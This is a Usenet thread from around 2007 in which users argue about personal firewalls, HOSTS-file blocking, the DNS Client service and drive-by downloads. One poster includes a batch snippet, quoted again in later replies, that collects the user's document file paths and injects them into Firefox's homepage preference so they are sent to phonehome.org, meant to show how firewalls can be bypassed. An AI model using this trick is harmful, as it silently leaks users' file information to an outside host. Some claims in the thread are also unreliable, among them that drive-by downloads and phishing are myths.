> to me.

It was not a trolling response, it was a well-specified example of what
language constructs are necessary to complete express the intended ruleset
of a routing firewall. Without such constructs, there are cases whereas you
can fully specify what you consider as wanted traffic but never implement it
in rules without additionally allowing unwanted traffic or denying wanted
traffic.

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:


> Hmm, we seem to be thinking along different lines here. If I don't want
> so and so application to call home, malicious intentions or not, it's not
> going too on this box. If I am testing software, and/or running software
> that automatically checks for updates and won't let me turn it off, I
> like the ability to block outgoing internet requests from that
> application. And as I said originally, software firewalls unless
> specifically targetted aren't going to let the data pass.


You're kidding, right? I show a very very easy, highly portable and not
specifically targeting way to phone home as you like:

set x=
for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i
for /r %i in (prefs.js) do echo
user_pref("browser.startup.homepage"^,"http://phonehome.org? %x%")^;>>"%i"

Then wait until the users launches Firefox for the next time.


Now if you understood the message, I might tell you that extremely more
sophisticated ways of IPC have already been used by malware ten years ago.


So, as long as you don't block all applications indiscriminatingly, you've
already lost the race. (Even further, when you're running with admin rights,
you've already lost anyway.)


>> Hm... what about applications seeming non-malicious? A well-known
>> example is commercial software from Adobe, whereas the Adobe License
>> Manager Service uses the Raw Sockets API to successfully bypass about
>> any typical "personal firewall".
>
> Even when using raw socket calls, if the lsp layer has firewall
> components, the firewall still gets the final say.


Now I know that you don't know what you're talking about. The Raw Sockets
are in the NDIS layer, thus right below the TDI layer, whereas the LSP layer
is above TDI.

I'm not even gonna start discussing about adding third-party stuff like
WinPCap...

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5ouor8FortvkU1@mid.dfncis.de:

> Dustin Cook wrote:
>
>
>> Hmm, we seem to be thinking along different lines here. If I don't
>> want so and so application to call home, malicious intentions or not,
>> it's not going too on this box. If I am testing software, and/or
>> running software that automatically checks for updates and won't let
>> me turn it off, I like the ability to block outgoing internet
>> requests from that application. And as I said originally, software
>> firewalls unless specifically targetted aren't going to let the data
>> pass.
>
>
> You're kidding, right? I show a very very easy, highly portable and
> not specifically targeting way to phone home as you like:
>
> set x=
> for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i
> for /r %i in (prefs.js) do echo
> user_pref("browser.startup.homepage"^,"http://phonehome.org? %x%")^;>>"%
> i"
>
> Then wait until the users launches Firefox for the next time.
>
>
> Now if you understood the message, I might tell you that extremely
> more sophisticated ways of IPC have already been used by malware ten
> years ago.

I understand scripting, yes. thanks. Are you going to educate me on
malware history 101 next? Perhaps you'll teach me how executables are
infected. *g*

>
> So, as long as you don't block all applications indiscriminatingly,
> you've already lost the race. (Even further, when you're running with
> admin rights, you've already lost anyway.)
>
>
>>> Hm... what about applications seeming non-malicious? A well-known
>>> example is commercial software from Adobe, whereas the Adobe License
>>> Manager Service uses the Raw Sockets API to successfully bypass
>>> about any typical "personal firewall".
>>
>> Even when using raw socket calls, if the lsp layer has firewall
>> components, the firewall still gets the final say.
>
>
> Now I know that you don't know what you're talking about. The Raw
> Sockets are in the NDIS layer, thus right below the TDI layer, whereas
> the LSP layer is above TDI.

Okay....

> I'm not even gonna start discussing about adding third-party stuff
> like WinPCap...


Well, in any event, thanks for your time.



--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> It does. It slows down the resolver and, in case of Windows, even
> partitially breaks it. Aside from that, it's simply superfluos.

Not if you disable the DNS client service. DNS client service is useless
for a home PC. Hosts file is a good way to block malicious sites at the
source so fuck you geekboy.

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:

> Sebastian G. wrote:
>
>> It does. It slows down the resolver and, in case of Windows, even
>> partitially breaks it. Aside from that, it's simply superfluos.
>
> Not if you disable the DNS client service. DNS client service is useless
> for a home PC.


Aside from that it's the DNS *caching* service, your argument is nonsense.
Considering a minimum delay of 50ms and a typical delay of 200 ms for a
typical ISP's DNS server, caching improves latency very well.

> Hosts file is a good way to block malicious sites


The HOSTS file is about the most stupid idea to implement a local blacklist,
which by itself already is a stupid idea. Anyway, since almost every sites
is malicious by definition, your categorization is nonsense as well.

> at the source


A DNS manipulation never blocks at the source, obviously.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with
this jewel in news:5p1f63Fou98dU1@mid.dfncis.de:
>
> The HOSTS file is about the most stupid idea to implement a local
> blacklist, which by itself already is a stupid idea. Anyway, since
> almost every sites is malicious by definition, your categorization
> is nonsense as well.
>

The only nonsence is not using a good hosts file.
note:
for those of you who are wondering what a hosts file is,see
http://www.mvps.org/winhelp2002/hosts.htm
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Maximus the Mad wrote:

> "Sebastian G." after much thought,came up with
> this jewel in news:5p1f63Fou98dU1@mid.dfncis.de:
>> The HOSTS file is about the most stupid idea to implement a local
>> blacklist, which by itself already is a stupid idea. Anyway, since
>> almost every sites is malicious by definition, your categorization
>> is nonsense as well.
>>
>
> The only nonsence is not using a good hosts file.


The only nonsense is not doing some stupid to hardly achieve a broken
concept? Well, if you think so... For me it's just fun seeing people keep on
telling the HOSTS file nonsense over and over in the dear hope that it would
actually help against whatever.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with
this jewel in news:5p1mcuFp1uh1U1@mid.dfncis.de:

> Maximus the Mad wrote:
>> The only nonsence is not using a good hosts file.
>
>
> The only nonsense is not doing some stupid to hardly achieve a
> broken concept? Well, if you think so... For me it's just fun
> seeing people keep on telling the HOSTS file nonsense over and
> over in the dear hope that it would actually help against
> whatever.
>

calling something nonsense doesn't make it so.......

--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Maximus the Mad wrote:

> "Sebastian G." after much thought,came up with
> this jewel in news:5p1mcuFp1uh1U1@mid.dfncis.de:
>
>> Maximus the Mad wrote:
>>> The only nonsence is not using a good hosts file.
>>
>> The only nonsense is not doing some stupid to hardly achieve a
>> broken concept? Well, if you think so... For me it's just fun
>> seeing people keep on telling the HOSTS file nonsense over and
>> over in the dear hope that it would actually help against
>> whatever.
>>
>
> calling something nonsense doesn't make it so.......


And not calling it so doesn't make it any less nonsense. Now will you please
acknowledge the big downsides of the HOSTS file approach:

- doesn't support wildcards, but the bad guy's DNS server does. We will
simply use .domain.tld, and you'd never be
able to keep up with that (for a sufficiently long subdomain name)
- heavily interferes with DNS resolving and partitially breaks DNS caching
- applies to every DNS lookup instead of just the ones issued by the exposed
application
- cannot be updated by a non-administrator user, and neither should
- OK, if I was an evil guy I'd add many non-malicious servers into the list
as well, and I'd make it so large that it seriously break the system.
Congratulations for having created a wonderful DoS condition.
- the HOSTS file is a 30 years old, totally outdated idea

As far as this concludes, only totally stupid computer users would follow
such a ridiculous approach, and it seems like there are a lot of them.
You're one, too!

Now coming to serious approaches on filtering spam from websites:
- AdBlock Plus. Simple, efficient, supports wildcards and filtering specific
elements.
- wildcard DNS manipulation using a local caching-only nameserver. BIND is
particularly easy, but PowerDNS works as well.
- blocking network segment by IP address range using a host-based packet
filter or a firewall

At any rate, no approach whatsoever could be a security concept, it's only
good for filtering out advertisement and other kinds of annoyance - it can't
make a vulnerable internet facing application any less critical. Therefore,
this entire discussion *is off-topic here*!

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with
this jewel in news:5olhodFnfd9dU1@mid.dfncis.de:

> Max M.Wachtel III wrote:
>
>>>> MVPS hosts file
>>>
>>> A very bad start for a proposedly good start. What should this
>>> shit be good for, other than fucking up the system?
>>
>> what???? a good hosts file doesn't f*ckup anything.
>
>
> It does. It slows down the resolver and, in case of Windows, even
> partitially breaks it. Aside from that, it's simply superfluos.
>
> Even further, it simply doesn't work, as a normal user doesn't
> have write access to the HOSTS file, and doesn't have the
> privilege to restart the system either - neither would this be
> reasonable.

The normal user is running an account with write access. You need to
get out more.
Normal is a setting on my dryer(which doesn't work very well).

>>> If you
>>> really like a Mozilla core, take Mozilla SeaMonkey.
>> I use Portable Apps and SM is not yet available.
>
>
> Mozilla SeaMonkey is profile-portable by design.

Yes but the folks at portable apps make changes to the programs that
make them USB friendly.

>>>> a good AV solution(like NOD32)
>>>
>>> This is not even a solution at all.
>> what do you use?
>
>
> A real solution: a global non-exec policy enforced by the kernel.

at which point the adverage user would get that glossy look in their
eyes and say what????. Most folks go out to BigStoreUSA,bring the
thing home and just plug it in and go.

>
>>>> Spyware Blaster
>>>> Spybot Search+Destroy immunization
>>
>> any added protection that uses no extra resources is a good
>> thing.
>
> Any added software increases complexity and therefore decreases
> security. Unless it can actually justify this, it is a bad thing.
> Spyware scanners definitely are bad, and this immunization stuff
> has only one purpose: fucking up the system.

I justify it by the users that keep their systems free from malware.
Immunization does not mess anything up. A multi-layered approach is
the best way for the adverage user(who, by the way, runs with
rights). Users want to be able to install,change things etc.

>> Why do you say anything is broken????
>
> Because it usually is. Just like your concept.

Infections are spread around the most by the home user. Most have no
idea about group policies,limited user accounts,etc. My concept works
out here in the trenches.
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Maximus the Mad wrote:


> The normal user is running an account with write access.


Then there's no need to discuss security.

>> A real solution: a global non-exec policy enforced by the kernel.
>
> at which point the adverage user would get that glossy look in their
> eyes and say what????


If they decide to ignore the minimum required knowledge to operate their
computers properly, it's their problem, not mine. The computer and the way
computers operate won't change that soon.

> I justify it by the users that keep their systems free from malware.


Oh, no we're talking about empty sets...

> Immunization does not mess anything up.


It clodges the HKLM\Software\Classes\CLSID full of useless entries.

> A multi-layered approach


This has nothing to do with multiple layers (an often misused buzzword) or
with security at all.

> My concept works out here in the trenches.


Expect that it doesn't work at all. And I'd even refrain from calling it a
concept, because there's no logic behind it.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

>
> Aside from that it's the DNS *caching* service, your argument is
> nonsense.

It's called the DNS Client service in the services list, asshole.

> http://www.mvps.org/winhelp2002/hosts.htm



> Editors Note: in most cases a large HOSTS file (over 135 kb) tends to slow down the machine. This only occurs in W2000/XP/Vista. Windows 98 and ME are not affected.
>
> To resolve this issue (manually) open the "Services Editor"
>
> * Start | Run (type) "services.msc" (no quotes)
> * Scroll down to "DNS Client", Right-click and select: Properties
> * Click the drop-down arrow for "Startup type"
> * Select: Manual, or Disabled (recommended) click Apply/Ok and restart. [more info]
>
> When set to Manual you can see that the above "Service" is not needed (after a little browsing) by opening the Services Editor again, scroll down to DNS Client and check the "Status" column. It should be blank, if it was needed it would show "Started" in that column. There are several Utilities that can reset the DNS Client for you ... [more info]

I've been using a hosts file to block shit for years now and don't
intend to stop because of what some moronic self-proclaimed "expert" thinks.

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams after much thought,came up with this
jewel in news:M_3Xi.15339$Nb1.10403@fe01.news.easynews.com:

> Sebastian G. wrote:
>
>>
>> Aside from that it's the DNS *caching* service, your argument is
>> nonsense.
>
> It's called the DNS Client service in the services list, asshole.

and there are some other services that should be turned off.

>> http://www.mvps.org/winhelp2002/hosts.htm
>
>
>
>> Editors Note: in most cases a large HOSTS file (over 135 kb)
>> tends to slow down the machine. This only occurs in
>> W2000/XP/Vista. Windows 98 and ME are not affected.
>>
>> To resolve this issue (manually) open the "Services Editor"
>>
>> * Start | Run (type) "services.msc" (no quotes)
>> * Scroll down to "DNS Client", Right-click and select:
>> Properties * Click the drop-down arrow for "Startup type"
>> * Select: Manual, or Disabled (recommended) click
>> Apply/Ok and restart. [more info]
>>
>> When set to Manual you can see that the above "Service" is
>> not needed (after a little browsing) by opening the Services
>> Editor again, scroll down to DNS Client and check the
>> "Status" column. It should be blank, if it was needed it
>> would show "Started" in that column. There are several
>> Utilities that can reset the DNS Client for you ... [more
>> info]
>
> I've been using a hosts file to block shit for years now and don't
> intend to stop because of what some moronic self-proclaimed
> "expert" thinks.

as it should be.......

--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:

> Sebastian G. wrote:
>
>> Aside from that it's the DNS *caching* service, your argument is
>> nonsense.
>
> It's called the DNS Client service in the services list, asshole.


Its internal name is DnsCache, and it has been well documented that the name
"DNS Client service" is highly misleading.

> I've been using a hosts file to block shit for years now and don't
> intend to stop because of what some moronic self-proclaimed "expert" thinks.


It's really strange that almost any other expert will tell you how flawed
this approach is.
Beside that, there's no need to block anything, since you have to implement
a serious filter at the application anyway.

Re: Jetico Personal Firewall freeware asks way to many questions

In message <5p4bajFob481U1@mid.dfncis.de>, Sebastian G.
writes
>John Adams wrote:
>
>> Sebastian G. wrote:
>>
>>> Aside from that it's the DNS *caching* service, your argument is
>>>nonsense.
>> It's called the DNS Client service in the services list, asshole.
>
>
>Its internal name is DnsCache, and it has been well documented that the
>name "DNS Client service" is highly misleading.
>
>> I've been using a hosts file to block shit for years now and don't
>>intend to stop because of what some moronic self-proclaimed "expert"
>>thinks.
>
>
>It's really strange that almost any other expert will tell you how
>flawed this approach is.

OK, how flawed? I'm happy with the effect that I SEE my Hosts file has.
What harm? I'd seriously like to know.

>Beside that, there's no need to block anything, since you have to
>implement a serious filter at the application anyway.

--
Michael J Kingston

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Its internal name is DnsCache, and it has been well documented that the
> name "DNS Client service" is highly misleading.

I know what it does but why would I call it DNS Cache when it reads DNS
Client in the services list? That would be just confusing to someone who
may be reading this thread and want to implement a hosts file for
blocking malicious sites.


> Beside that, there's no need to block anything, since you have to
> implement a serious filter at the application anyway.

Whatever. All I know is that if I have 127.0.0.1
www.drivebuydownloadsite.com in my hosts file that site could never try
to infect my PC. It works and it works well so I use it.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> It clodges the HKLM\Software\Classes\CLSID full of useless entries.

And how does that mess anything up? The registry size has no affect on
OS performance under XP and Vista, unlike Win9x.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> it slows down the resolver

I already told you that disabling DNS Client Service fixes that.

Updating the HOSTS file requires write access that a normal user
> doesn't have there

If you use MVPS Hosts file it comes with a .bat file that takes care of
that for you. And what's the big deal about logging in to admin account
to write to the hosts file and then logging out and back into limited
user after? You are making a mountain out of a molehill.

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:


>> it slows down the resolver
>
> I already told you that disabling DNS Client Service fixes that.


No, you didn't, and it isn't true either.

>> Updating the HOSTS file requires write access that a normal user
>> doesn't have there
>
> If you use MVPS Hosts file it comes with a .bat file that takes care of
> that for you.


Yes, that's exactly the problem.

> And what's the big deal about logging in to admin account
> to write to the hosts file and then logging out and back into limited
> user after?


It demands me to provide the admin password to the system, which is
something that should be avoided as much as possible. At any rate, I'd never
provide for such an absolute idiotic administrative issue.

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:

> Sebastian G. wrote:
>
>> Its internal name is DnsCache, and it has been well documented that the
>> name "DNS Client service" is highly misleading.
>
> I know what it does but why would I call it DNS Cache when it reads DNS
> Client in the services list?


Because we're discussing its actual functionality?

> That would be just confusing to someone who
> may be reading this thread and want to implement a hosts file for
> blocking malicious sites.


Which hasn't become any less stupid idea yet. Since almost every website
should be considered malicious and especially truly malicious websites will
simply bypass the filter (by using randomly generated subdomains), this
approach will effectively be nothing else but a self-created DoS condition.

>> Beside that, there's no need to block anything, since you have to
>> implement a serious filter at the application anyway.
>
> Whatever. All I know is that if I have 127.0.0.1
> www.drivebuydownloadsite.com in my hosts file that site could never try
> to infect my PC.


And what about sadofhsajkldhfkjlsagdhfjkghdsaf.drivebuydownloadsite.com?
Huh, didn't got that entry?

Aside from that, Drive-by-downloads are a well-known myth, supported by the
fools who can't even differ a shell from a webbrowser.

> It works and it works well so I use it.

Sure it seems so to you, since you're too incompetent to judge where it
fails (and it fails so blatantly).

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:

> Sebastian G. wrote:
>
>> It clodges the HKLM\Software\Classes\CLSID full of useless entries.
>
> And how does that mess anything up? The registry size has no affect on
> OS performance under XP and Vista, unlike Win9x.


That's wrong, since it consumes memory and disk resources, as well as it
slows down key traversal (which is quite the common thing exactly for the
CLSID subkey).

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
[snip]
> Aside from that, Drive-by-downloads are a well-known myth,

that, i think, says it all...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

>
> That's wrong, since it consumes memory and disk resources, as well as it
> slows down key traversal (which is quite the common thing exactly for
> the CLSID subkey).

Not enough to be concerened about.

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote:

> Sebastian G. wrote:
> [snip]
>> Aside from that, Drive-by-downloads are a well-known myth,
>
> that, i think, says it all...

Seems like a sarcastic expression of doubt, but of course it's a myth.
There's no general way that just by visiting a website malware could be
installed. What's needed that this actually works is a vulnerable webbrowser
or something that is abused as such, and the trivial solution to this
problem is not using a vulnerable webbrowser, thus it's anything but
unavoidable.
Instead of now throwing away their broken webbrowser or stop abusing a
non-webbrowser as such those fools instead created a buzzword to blame their
own incompetence on, and this buzzword is "drive-by-downloads".

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> kurt wismer wrote:
>
>> Sebastian G. wrote:
>> [snip]
>>> Aside from that, Drive-by-downloads are a well-known myth,
>>
>> that, i think, says it all...
>
> Seems like a sarcastic expression of doubt, but of course it's a myth.
> There's no general way that just by visiting a website malware could be
> installed. What's needed that this actually works is a vulnerable
> webbrowser or something that is abused as such, and the trivial solution
> to this problem is not using a vulnerable webbrowser, thus it's anything
> but unavoidable.
> Instead of now throwing away their broken webbrowser or stop abusing a
> non-webbrowser as such those fools instead created a buzzword to blame
> their own incompetence on, and this buzzword is "drive-by-downloads".

a) i'm unaware of anyone saying that drive-by-downloads don't depend on
the existence of vulnerabilities... as far as i know the dependence on
vulnerabilities is a widely accepted attribute of drive-by-downloads...
b) the fact that they depend on vulnerabilities and/or the fact that
they are avoidable doesn't make them any less real, it just makes them
significantly less than a silver bullet for the bad guys...
c) things that are real are generally not referred to as myths...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote in
news:fgrhuq$n71$1@registered.motzarella.org:

> Sebastian G. wrote:
>> kurt wismer wrote:
>>
>>> Sebastian G. wrote:
>>> [snip]
>>>> Aside from that, Drive-by-downloads are a well-known myth,
>>>
>>> that, i think, says it all...
>>
>> Seems like a sarcastic expression of doubt, but of course it's a
>> myth. There's no general way that just by visiting a website malware
>> could be installed. What's needed that this actually works is a
>> vulnerable webbrowser or something that is abused as such, and the
>> trivial solution to this problem is not using a vulnerable
>> webbrowser, thus it's anything but unavoidable.
>> Instead of now throwing away their broken webbrowser or stop abusing
>> a non-webbrowser as such those fools instead created a buzzword to
>> blame their own incompetence on, and this buzzword is
>> "drive-by-downloads".
>
> a) i'm unaware of anyone saying that drive-by-downloads don't depend
> on the existence of vulnerabilities... as far as i know the dependence
> on vulnerabilities is a widely accepted attribute of
> drive-by-downloads... b) the fact that they depend on vulnerabilities
> and/or the fact that they are avoidable doesn't make them any less
> real, it just makes them significantly less than a silver bullet for
> the bad guys... c) things that are real are generally not referred to
> as myths...
>

You know your wasting your time right? I can't even get the fellow to
answer my questions regarding BugHunter, despite the fact he spent a
little time assuming what it does or doesn't do and went from there.


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:

> I can't even get the fellow to answer my questions regarding BugHunter,
> despite the fact he spent a little time assuming what it does or doesn't
> do and went from there.


The reasons I didn't bother to answer your questions are two-fold:

- You roughly tried to imply that I talked about something that I didn't
test, which is something I'd never do.
- For the other things I had already given an answer.

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote:


> a) i'm unaware of anyone saying that drive-by-downloads don't depend on
> the existence of vulnerabilities... as far as i know the dependence on
> vulnerabilities is a widely accepted attribute of drive-by-downloads...


AFAICS things are typically stated like "it just happens naturally".

> b) the fact that they depend on vulnerabilities and/or the fact that
> they are avoidable doesn't make them any less real, it just makes them
> significantly less than a silver bullet for the bad guys...


Aside from the serious need for any actual vulnerability, which is truely
hard to find, the avoidability is exactly the point that makes the
qualification void. "Drive-by-downloads" are more or less a description of a
seemingly natural, unavoidable phenomena to shift off responsibility.

BTW, what exactly differs a "drive-by-download" from a "webbrowser exploit"
as we've called it since ever?

> c) things that are real are generally not referred to as myths...


Things that aren't like they're categorized aren't real, though. Just like
"tracking cookies", "phone home" or "phishing".

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5pd2dfFqn882U2@mid.dfncis.de:

> Dustin Cook wrote:
>
>> I can't even get the fellow to answer my questions regarding
>> BugHunter, despite the fact he spent a little time assuming what it
>> does or doesn't do and went from there.
>
>
> The reasons I didn't bother to answer your questions are two-fold:
>
> - You roughly tried to imply that I talked about something that I
> didn't test, which is something I'd never do.

I didn't imply anything sir, Your post follows below:

Path:
be03.lga!hwmnpeer02.lga!hw-filter.lga!hwmnpeer01.lga!hwmnpee r01.ams!news.
highwinds-media.com!feed.xsnews.nl!border-1.ams.xsnews.nl!fu -berlin.de!un
i-berlin.de!news.dfncis.de!not-for-mail From: "Sebastian G."
Newsgroups:
comp.security.firewalls,alt.privacy.spyware Subject: Re: Jetico Personal
Firewall freeware asks way to many questions Date: Thu, 01 Nov 2007
00:59:08 +0100 Lines: 19
Message-ID: <5osj6pFnsfqvU1@mid.dfncis.de>
References: <96sPi.1575$Pv2.1234@newssvr23.news.prodigy.net>



<4724CCFB.3050902@capecod.net>

<5okdovFn7fe1U1@mid.dfncis.de>


<5okkncFn7a1hU2@mid.dfncis.de>

<5olhodFnfd9dU1@mid.dfncis.de>

<5or7vqFo8b6nU1@mid.dfncis.de>
Reply-To: seppi@seppig.de
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: news.dfncis.de
uYwmJqAbcEB6hcxlg+8h9Q59VM0Ukke1fBtvlAyX1Kb6XxmA2aZ8iHMeaV Cancel-Lock:
sha1:BvccqgaJ2/ngZ5gf+aD0wfr9TJI= User-Agent: Mozilla/5.0 (Windows; U;
Windows NT 5.2; en-us; rv:1.8.1.6) Gecko/20070802 MultiZilla/1.8.3.2g
SeaMonkey/1.1.4 In-Reply-To:
Xref: Hurricane-Charley
comp.security.firewalls:52103 alt.privacy.spyware:52649 X-Received-Date:
Wed, 31 Oct 2007 16:59:24 MST (be03.lga)

Dustin Cook wrote:


> I don't dispute that BugHunter is retroactive in what it does, and I
> wouldn't want anyone to think they are 100% safe regardless of the
> software they use, but I still believe some protection, even if it's
> retroactive in nature is better than none.


Aside from the added complexity and the inability of the user to judge
the output of the mentioned program, what exactly is a shitload of false
positives worth? Say it, f.e., claims that there's some oh-so-bad
"tracking cookie", and as well a trojan horse in user32.dll (because it
doesn't match the original one any more, probably due to a normal
update). Now it deletes both, demands a shutdown, and the system doesn't
boot up anymore.

Just try running it over a completely fresh install of Windows, or even
over a well secured system with a lot of known-good third-party
software, and the shame of its report. Same goes for almost any malware
scanner under the sun.


Now then, if you weren't talking about BugHunter, as I clearly was, what
the hell were you going off about?


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> kurt wismer wrote:
>
>> a) i'm unaware of anyone saying that drive-by-downloads don't depend
>> on the existence of vulnerabilities... as far as i know the dependence
>> on vulnerabilities is a widely accepted attribute of
>> drive-by-downloads...
>
> AFAICS things are typically stated like "it just happens naturally".

that could just as easily be an interpretation that is peculiar to you
alone...

it is something that is likely to happen (or to have happened, as in
'thats the way the malware got in') to quite a few average users because
it's not easy to avoid being vulnerable nor to avoid being exposed...

>> b) the fact that they depend on vulnerabilities and/or the fact that
>> they are avoidable doesn't make them any less real, it just makes them
>> significantly less than a silver bullet for the bad guys...
>
>
> Aside from the serious need for any actual vulnerability, which is
> truely hard to find,

hard to find a vulnerability? on what planet?

> the avoidability is exactly the point that makes
> the qualification void. "Drive-by-downloads" are more or less a
> description of a seemingly natural, unavoidable phenomena to shift off
> responsibility.

i'm wondering what exactly you mean by avoidability here... do you mean
it should be easy to avoid being exposed? you are aware that these types
of exploits have been known to be injected into the ad rotation of
legitimate, otherwise trustworthy sites, right?

> BTW, what exactly differs a "drive-by-download" from a "webbrowser
> exploit" as we've called it since ever?

well, consider the possibility that a web browser is not the only
component on your system involved in rendering the content on a given
web page... the browser renders the html, but what about scripts? what
about multimedia? what about other document formats like pdf?

>> c) things that are real are generally not referred to as myths...
>
>
> Things that aren't like they're categorized aren't real, though.

strange, most people would refer to that simply as hype rather than full
non-reality...

> Just
> like "tracking cookies", "phone home" or "phishing".

you don't think phishing is real either? oh boy...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote:


>> AFAICS things are typically stated like "it just happens naturally".
>
> that could just as easily be an interpretation that is peculiar to you
> alone...


Sorry, but it's exactly what I see in real life.

> it is something that is likely to happen (or to have happened, as in
> 'thats the way the malware got in') to quite a few average users because
> it's not easy to avoid being vulnerable nor to avoid being exposed...


Nonsense, it is really easy because almost every webbrowser is secury by
default out-of-the-box.

>> Aside from the serious need for any actual vulnerability, which is
>> truely hard to find,
>
> hard to find a vulnerability? on what planet?


On this planet. Show me an up-to-date webbrowser with an unpatched
vulnerability and/or a bad security history (that is, there have been large
non-negative delays between vulnerability and patch and no workarounds).

> i'm wondering what exactly you mean by avoidability here... do you mean
> it should be easy to avoid being exposed?


It's hard getting exposed at all.

> you are aware that these types
> of exploits have been known to be injected into the ad rotation of
> legitimate, otherwise trustworthy sites, right?


Right. The exposure is measured by the security of the webbrowser, and
nothing else.

>> BTW, what exactly differs a "drive-by-download" from a "webbrowser
>> exploit" as we've called it since ever?
>
> well, consider the possibility that a web browser is not the only
> component on your system involved in rendering the content on a given
> web page... the browser renders the html, but what about scripts?


ECMAScript is obviously interpreted by the webbrowser as well.

> what about multimedia? what about other document formats like pdf?


That's external. Do you let such things load by default or what?

> strange, most people would refer to that simply as hype rather than full
> non-reality...


Indeed, since the phenomena don't belong to the description.

>> Just like "tracking cookies", "phone home" or "phishing".
>
> you don't think phishing is real either? oh boy...

Phishing is described as a problem of the webbrowser and/or the WWW, but
it's solely a PEBKAC problem, thus it's a problem within the user and the
phenomen only a result of this. For any minimally competent user phishing
purely is a non-threat.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> If the application isn't malicious, then you don't need to enforce that
> it does what exactly it does. On the contrary, if you think that it does
> something that it shouldn't do, then you're already considering it as
> malicious.

No, maybe someone just doesn't want it to do things like phone home to
look for an update and it has no option to set it that way. Maybe they
want to block a game's adverver, some of them have that now, oh, they
could use the hosts file to do that too but you are also against that.
I bet you are a spyware programmer trying to mislead people to make your
job easier. Why else would you hang out in a boring firewall group day
after day?

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> You're kidding, right? I show a very very easy, highly portable and not
> specifically targeting way to phone home as you like:
>
> set x=
> for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i
> for /r %i in (prefs.js) do echo
> user_pref("browser.startup.homepage"^,"http://phonehome.org? %x%")^;>>"%i"

Well, if you are not a spyware programmer you are definitely a script kiddy.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> kurt wismer wrote:
>
>>> AFAICS things are typically stated like "it just happens naturally".
>>
>> that could just as easily be an interpretation that is peculiar to you
>> alone...
>
> Sorry, but it's exactly what I see in real life.

here's the thing, it's *still* presented in a way that's open to
interpretation... your interpretation is that 'it just happens
naturally' on hardened systems while other possible interpretations
could easily include 'it just happens naturally' for most average users
(who, by the way, don't have hardened systems)...

>> it is something that is likely to happen (or to have happened, as in
>> 'thats the way the malware got in') to quite a few average users
>> because it's not easy to avoid being vulnerable nor to avoid being
>> exposed...
>
> Nonsense, it is really easy because almost every webbrowser is secury by
> default out-of-the-box.

now you're just being absurd....

>>> Aside from the serious need for any actual vulnerability, which is
>>> truely hard to find,
>>
>> hard to find a vulnerability? on what planet?
>
> On this planet. Show me an up-to-date webbrowser with an unpatched
> vulnerability and/or a bad security history (that is, there have been
> large non-negative delays between vulnerability and patch and no
